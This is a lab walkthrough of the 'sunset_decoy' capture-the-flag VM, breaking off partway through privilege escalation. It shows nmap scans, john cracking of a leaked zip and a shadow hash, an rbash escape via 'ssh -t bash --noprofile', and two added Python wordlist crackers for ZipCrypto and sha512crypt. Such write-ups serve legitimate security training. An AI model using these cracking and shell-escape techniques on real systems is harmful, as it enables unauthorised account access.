sunset_decoy target machine

Information gathering

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 08:10 EDT
Nmap scan report for 192.168.56.131
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:0E:3C:2A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

Ports 22 (SSH) and 80 (HTTP) are open. The fast full-range sweep above only finds the ports; now run a version and script scan restricted to those two:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 08:16 EDT
Nmap scan report for 192.168.56.131
Host is up (0.00052s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|_
|_http-title: Index of /
MAC Address: 08:00:27:0E:3C:2A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds

The target runs Debian, and port 80 is an Apache directory listing that exposes a single archive, save.zip. Download it and inspect it locally:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ file save.zip
save.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ unzip -l save.zip
Archive: save.zip
Length Date Time Name
--------- ---------- ----- ----
1807 2020-06-27 18:05 etc/passwd
1111 2020-07-07 16:26 etc/shadow
829 2020-06-27 17:40 etc/group
669 2020-02-02 02:41 etc/sudoers
185 2020-06-27 16:58 etc/hosts
33 2020-06-27 17:39 etc/hostname
--------- -------
4634 6 files

Cracking the zip password

This looks like a leak of sensitive system files (/etc/passwd, /etc/shadow, /etc/sudoers and friends). Extracting it prompts for a password, so the next step is to crack that password:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ unzip save.zip
Archive: save.zip
[save.zip] etc/passwd password:

Convert the archive into a john-compatible hash with zip2john, then run john against it with the rockyou wordlist:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ zip2john save.zip > ziphash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ts=90AB cs=90ab type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ts=834F cs=834f type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ts=8D07 cs=8d07 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: TS_chk, cmplen=368, decmplen=669, crc=FF05389F ts=1535 cs=1535 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ts=8759 cs=8759 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** save.zip/etc/hostname PKZIP Encr: TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 ts=8CE8 cs=8ce8 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ ls
save.zip ziphash

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ cat ziphash
save.zip:$pkzip$6*1*1*0*8*24*8759*a7409df1d7a76ad3809794d387209855bb7638aa589d5be62b9bf373d78055e1dd351925*1*0*8*24*1535*459926ee53809fa53fe26c3e4548cd7819791a638c8d96d3ec7cf18477ffa1e9e2e77944*1*0*8*24*834f*7d2cbe98180e5e9b8c31c5aec89c507011d26766981d17d249e5886e51ac03270b009d62*1*0*8*24*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip$::save.zip:etc/hostname, etc/hosts, etc/sudoers, etc/shadow, etc/group, etc/passwd:save.zip
┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (save.zip)
1g 0:00:00:00 DONE (2023-07-19 08:36) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
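
As an added example (not part of the original post), the Python below implements the traditional PKZIP stream cipher that an archive like save.zip uses, builds a small encrypted archive from constructed stand-in contents, and then runs a wordlist attack on it with the standard library's zipfile module. It is the slow, readable version of what zip2john and john do, and it makes one practitioner-relevant caveat visible: the 12-byte encryption header carries a single check byte, so roughly one wrong password in 256 passes that check and is only rejected by the CRC-32 after the whole entry has been decrypted. zip2john's `TS_chk` above reports the variant where that byte comes from the file timestamp; the constructed archive here uses the CRC variant. The entry name, contents, password and wordlist are all made up for the example.

```python
"""Traditional PKZIP encryption (ZipCrypto) and a wordlist attack on it.

Added example, not code from the original post. Python cannot write
encrypted archives, so this builds a small one by hand and then guesses
the password with zipfile. Everything below (entry name, contents,
password, wordlist) is constructed for the demonstration.
"""
import io
import struct
import zipfile
import zlib

PKZIP_INITIAL_KEYS = (0x12345678, 0x23456789, 0x34567890)


def _crc32_step(crc: int, byte: int) -> int:
    # PKZIP updates a raw CRC register without the pre/post inversion that
    # zlib.crc32 applies, so undo that inversion on both sides of the call.
    return zlib.crc32(bytes([byte]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF


class ZipCrypto:
    """Key schedule shared by encryption and decryption."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = PKZIP_INITIAL_KEYS
        for b in password:
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = _crc32_step(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc32_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plain: bytes) -> bytes:
        out = bytearray()
        for c in plain:
            out.append(c ^ self._keystream_byte())
            self._update(c)  # the keys advance on the plaintext byte
        return bytes(out)


def build_encrypted_zip(name: str, plain: bytes, password: bytes) -> bytes:
    """Stored (uncompressed) single-entry archive with ZipCrypto applied."""
    crc = zlib.crc32(plain) & 0xFFFFFFFF
    # 12-byte encryption header: 11 bytes a real zip tool randomises (fixed
    # here for reproducibility) plus one check byte, the high byte of the
    # CRC. That single byte is all a decryptor can test a password against
    # before decrypting, hence the roughly 1-in-256 false-accept rate.
    header = b"\x00" * 11 + bytes([(crc >> 24) & 0xFF])
    body = ZipCrypto(password).encrypt(header + plain)
    fname = name.encode()
    flags, method, dos_time, dos_date = 0x0001, 0, 0, 0x0021  # encrypted, stored, 1980-01-01
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, dos_time,
                        dos_date, crc, len(body), len(plain), len(fname), 0) + fname
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method,
                          dos_time, dos_date, crc, len(body), len(plain),
                          len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central),
                       len(local) + len(body), 0)
    return local + body + central + eocd


def decrypt_entry(archive: bytes, name: str, password: bytes) -> bytes:
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(name, pwd=password)


def crack_zip(archive: bytes, name: str, candidates) -> dict:
    """Try each candidate; count guesses that pass the check byte but fail the CRC."""
    result = {"password": None, "false_positives": 0}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for pw in candidates:
            try:
                with zf.open(name, pwd=pw) as fh:
                    fh.read()  # zipfile verifies the CRC-32 at end of entry
            except RuntimeError:  # "Bad password": rejected by the check byte
                continue
            except zipfile.BadZipFile:  # passed the check byte, failed the CRC
                result["false_positives"] += 1
                continue
            result["password"] = pw
            break
    return result


# Constructed sample data standing in for the leaked etc/passwd.
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n"
ARCHIVE = build_encrypted_zip("etc/passwd", SAMPLE_PASSWD, b"manuel")
WORDLIST = [b"123456", b"password", b"manuel"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    print(crack_zip(ARCHIVE, "etc/passwd", WORDLIST))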

The extraction password is manuel. A successful inflate of every entry is the real confirmation (the zip check byte alone can accept a wrong password); extract the archive and go through each file:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ unzip save.zip
Archive: save.zip
[save.zip] etc/passwd password:
inflating: etc/passwd
inflating: etc/shadow
inflating: etc/group
inflating: etc/sudoers
inflating: etc/hosts
extracting: etc/hostname

Look at the shadow file first:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ cd etc
┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ cat shadow
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::
sync:*:18440:0:99999:7:::
games:*:18440:0:99999:7:::
man:*:18440:0:99999:7:::
lp:*:18440:0:99999:7:::
mail:*:18440:0:99999:7:::
news:*:18440:0:99999:7:::
uucp:*:18440:0:99999:7:::
proxy:*:18440:0:99999:7:::
www-data:*:18440:0:99999:7:::
backup:*:18440:0:99999:7:::
list:*:18440:0:99999:7:::
irc:*:18440:0:99999:7:::
gnats:*:18440:0:99999:7:::
nobody:*:18440:0:99999:7:::
_apt:*:18440:0:99999:7:::
systemd-timesync:*:18440:0:99999:7:::
systemd-network:*:18440:0:99999:7:::
systemd-resolve:*:18440:0:99999:7:::
messagebus:*:18440:0:99999:7:::
avahi-autoipd:*:18440:0:99999:7:::
sshd:*:18440:0:99999:7:::
avahi:*:18440:0:99999:7:::
saned:*:18440:0:99999:7:::
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

That gives two hashes. root's is unlikely to fall to a straight wordlist attack (the box would be far too easy otherwise), but it is still worth trying later.

Cracking the shadow hashes

Crack the hash of user 296640a3b825115a47b68fc44501c828 first. (In the transcript below the echo extracts the root line into roothash, while the file actually handed to john, passwdhash, holds that user's line; the step that created passwdhash is not shown, but john reports loading a single hash and cracks that account.)

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ echo 'root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::' > roothash

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ mv roothash ../


┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt passwdhash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server (296640a3b825115a47b68fc44501c828)
1g 0:00:00:05 DONE (2023-07-19 08:40) 0.1712g/s 2936p/s 2936c/s 2936C/s felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
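
The crack above is quick because each rockyou word costs one sha512crypt computation per hash. To make that cost concrete and to show exactly what john verifies, here is an added example (not from the original post) that re-implements sha512crypt (`$6$`) with hashlib, parses shadow lines (skipping locked `*`/`!` accounts), and tests a constructed three-word stand-in for rockyou.txt against the two real hashes from save.zip. The 5000 chained SHA-512 rounds per guess are what make a pure-Python cracker slow compared with john, and what make a strong root password survive.

```python
"""sha512crypt ($6$) re-implemented with hashlib, plus a tiny shadow cracker.

Added example, not from the original post. The two hash lines are the real
ones from save.zip; the candidate list is a constructed stand-in for
rockyou.txt.
"""
import hashlib

B64_ALPHABET = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Output byte order used by crypt(3) for SHA-512 (from the algorithm spec).
_SHUFFLE = (
    (0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
    (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
    (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
    (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
    (62, 20, 41),
)


def _b64_from_24bit(b2: int, b1: int, b0: int, n: int) -> bytes:
    w = (b2 << 16) | (b1 << 8) | b0
    out = bytearray()
    for _ in range(n):
        out.append(B64_ALPHABET[w & 0x3F])
        w >>= 6
    return bytes(out)


def _repeat_to(block: bytes, length: int) -> bytes:
    return block * (length // len(block)) + block[: length % len(block)]


def sha512_crypt(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    salt = salt[:16]  # crypt(3) uses at most 16 salt characters
    sha = hashlib.sha512
    plen = len(password)

    b = sha(password + salt + password).digest()
    a_in = password + salt + _repeat_to(b, plen)
    n = plen
    while n > 0:  # one block per bit of len(password), lowest bit first
        a_in += b if n & 1 else password
        n >>= 1
    a = sha(a_in).digest()

    p = _repeat_to(sha(password * plen).digest(), plen)
    s = _repeat_to(sha(salt * (16 + a[0])).digest(), len(salt))

    c = a
    for i in range(rounds):  # the expensive part: 5000 chained SHA-512s by default
        buf = (p if i & 1 else c) + (s if i % 3 else b"") + (p if i % 7 else b"") + (c if i & 1 else p)
        c = sha(buf).digest()

    enc = b"".join(_b64_from_24bit(c[x], c[y], c[z], 4) for x, y, z in _SHUFFLE)
    enc += _b64_from_24bit(0, 0, c[63], 2)
    prefix = b"$6$" + (b"" if rounds == 5000 else b"rounds=%d$" % rounds)
    return (prefix + salt + b"$" + enc).decode()


def parse_shadow_line(line: str):
    """Return (user, salt, rounds, full hash field) for a $6$ shadow line."""
    user, field = line.split(":", 2)[:2]
    parts = field.split("$")  # ['', '6', [rounds=N,] salt, hash]
    if len(parts) < 4 or parts[1] != "6":
        raise ValueError(f"{user}: not a sha512crypt hash")
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][7:])
        parts.pop(2)
    return user, parts[2].encode(), rounds, field


def crack(shadow_lines, candidates) -> dict:
    """Wordlist attack: {user: password} for every line a candidate matches."""
    found = {}
    for line in shadow_lines:
        field = line.split(":", 2)[1]
        if not field or field.startswith(("*", "!")):
            continue  # locked or passwordless account: nothing to crack
        user, salt, rounds, field = parse_shadow_line(line)
        for pw in candidates:
            if sha512_crypt(pw.encode(), salt, rounds) == field:
                found[user] = pw
                break
    return found


SHADOW = [
    "root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::",
    "daemon:*:18440:0:99999:7:::",
    "296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::",
]
CANDIDATES = ["123456", "password", "server"]  # constructed stand-in wordlist

if __name__ == "__main__":
    print(crack(SHADOW, CANDIDATES))
```

Run as a script it prints the user/password pairs found, which for this list is only the 296640... account; root's line is hashed against the same three guesses and simply does not match, and the locked daemon line is skipped without any hashing.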

That yields the password server. Next: log in over SSH, enumerate the box from the inside and work on privilege escalation.

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.131
296640a3b825115a47b68fc44501c828@192.168.56.131's password:
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 19 08:45:11 2023 from 192.168.56.106
-rbash: dircolors: command not found

Once again we land in rbash, a restricted shell.

rbash bypass

Next, try to break out of it:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls
honeypot.decoy honeypot.decoy.cpp id ifconfig ls mkdir ncal SV-502 user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
-rbash: whoami: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ifconfig
-rbash: ifconfig: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export $PATH
-rbash: export: `PATH:/home/296640a3b825115a47b68fc44501c828/': not a valid identifier

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export $SHELL
-rbash: export: `/bin/rbash': not a valid identifier

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd
-rbash: cd: restricted
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names

Very few commands work. The output shows why: PATH is pinned to the home directory, so only the symlinks placed there (id, ls, mkdir) resolve; the ifconfig link points at /bin/ifconfig, which evidently does not exist on this box. rbash additionally forbids cd, assigning PATH or SHELL, and any command name containing a slash. (The export attempts above expanded the variables, `export $PATH`, so they failed on syntax before rbash's own restriction even applied; `export PATH=...` would have been refused too.) With no obvious escape from inside the restricted shell, ask for a different shell at SSH login time instead:

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.131 -t "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.56.131's password:
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
bash: whoami: command not found

The error now comes from plain bash rather than rbash. sshd hands the requested command to the login shell, and rbash only rejects command names that contain a slash, so a bare `bash` found on PATH is allowed and the child bash carries none of the restrictions. `--noprofile` skips .profile, but the restricted PATH is still inherited from the parent's environment, which is why commands are still not found. Set a usable PATH explicitly:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export PATH=/bin/:/usr/bin:$PATH
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
296640a3b825115a47b68fc44501c828

That gives a proper, unrestricted shell.

Privilege escalation

Basic system information first:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:0e:3c:2a brd ff:ff:ff:ff:ff:ff
inet 192.168.56.131/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 384sec preferred_lft 384sec
inet6 fe80::a00:27ff:fe0e:3c2a/64 scope link
valid_lft forever preferred_lft forever

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ uname -a
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat /etc/issue
Debian GNU/Linux 10 \n \l

sudo -l to check for any sudo rights:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ sudo -l
sudo: unable to resolve host 60832e9f188106ec5bcc4eb7709ce592: Temporary failure in name resolution

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for 296640a3b825115a47b68fc44501c828:
Sorry, user 296640a3b825115a47b68fc44501c828 may not run sudo on 60832e9f188106ec5bcc4eb7709ce592.

Files in the home directory:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih
total 68K
278645 drwxr-xr-x 5 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 20 04:56 .
262151 drwxr-xr-x 3 root root 4.0K Jun 27 2020 ..
262357 lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
262368 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
266583 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3.5K Jun 27 2020 .bashrc
278647 drwx------ 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 20 03:17 .config
274005 -rwxr-xr-x 1 root root 18K Jul 7 2020 honeypot.decoy
273951 -rw------- 1 root root 1.9K Jul 7 2020 honeypot.decoy.cpp
273999 lrwxrwxrwx 1 root root 7 Jun 27 2020 id -> /bin/id
274000 lrwxrwxrwx 1 root root 13 Jun 27 2020 ifconfig -> /bin/ifconfig
278683 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27 2020 .local
273998 lrwxrwxrwx 1 root root 7 Jun 27 2020 ls -> /bin/ls
273996 lrwxrwxrwx 1 root root 10 Jun 27 2020 mkdir -> /bin/mkdir
268864 -rwxr-xr-x 1 root root 807 Jun 27 2020 .profile
273950 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 .selected_editor
278652 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27 2020 SV-502
266645 -rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Jul 7 2020 user.txt
273944 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 173 Jun 27 2020 .wget-hsts

There is an unusual root-owned executable, honeypot.decoy, next to its source honeypot.decoy.cpp, which we cannot read. Run strings on the binary instead; the interesting strings are:

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:
No available option was selected. Ending program.
/usr/bin/date
/usr/bin/cal
Shutdown is currently not available due to not enough privileges. Ending program.
Rebooting is currently not available due to not enough privileges. Ending program.
/usr/bin/touch /dev/shm/STTY5246
The AV Scan will be launched in a minute or less.
/usr/bin/cat /etc/passwd
/usr/bin/vi /tmp/cmFuZG9tc2Zvc2FuZm9kYW52cw==
/usr/sbin/service apache2 status

Each menu number runs a different external program. Note that option 5, the "AV Scan", only touches the marker file /dev/shm/STTY5246; the scan itself must be launched by some other process that watches for that file. Look at each command the binary references:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/date
132694 -rwxr-xr-x 1 root root 107K Feb 28 2019 /usr/bin/date
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/cal
136534 lrwxrwxrwx 1 root root 4 May 4 2018 /usr/bin/cal -> ncal
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/touch /dev/shm/STTY5246
47043 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 0 Jul 20 04:25 /dev/shm/STTY5246
132714 -rwxr-xr-x 1 root root 95K Feb 28 2019 /usr/bin/touch
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/cat /etc/passwd
158998 -rw-r--r-- 1 root root 1.8K Jun 27 2020 /etc/passwd
132688 -rwxr-xr-x 1 root root 43K Feb 28 2019 /usr/bin/cat
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/vi /tmp/cmFuZG9tc2Zvc2FuZm9kYW52cw==
ls: cannot access '/tmp/cmFuZG9tc2Zvc2FuZm9kYW52cw==': No such file or directory
138880 lrwxrwxrwx 1 root root 20 Jun 27 2020 /usr/bin/vi -> /etc/alternatives/vi
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -liah /usr/sbin/service
133198 -rwxr-xr-x 1 root root 9.1K Dec 3 2018 /usr/sbin/service

What first caught my attention was that /usr/bin/cal is a symlink with a relative target (ncal). I tried to get my own ncal picked up in its place, but that failed: a relative symlink target is resolved relative to the link's own directory (here /usr/bin/ncal), not through PATH, so an ncal in the home directory is never consulted even though `which` finds it there first:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/$ which ncal
/home/296640a3b825115a47b68fc44501c828//ncal

The 777 mode on the symlinks also bothered me, but a symlink always shows lrwxrwxrwx; the effective permissions are those of the file it points to.

That leaves the mysterious AV scan and the SV-502 directory, which turns out to contain a log file:

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls -alih
total 12K
278652 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27 2020 .
278645 drwxr-xr-x 5 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 20 04:56 ..
273943 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 0 Jun 27 2020 fich
266656 drwxrwxrwx 2 root root 4.0K Jun 27 2020 logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls -alih
total 16K
266656 drwxrwxrwx 2 root root 4.0K Jun 27 2020 .
278652 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27 2020 ..
274020 -rw-r--r-- 1 root root 7.7K Jun 27 2020 log.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
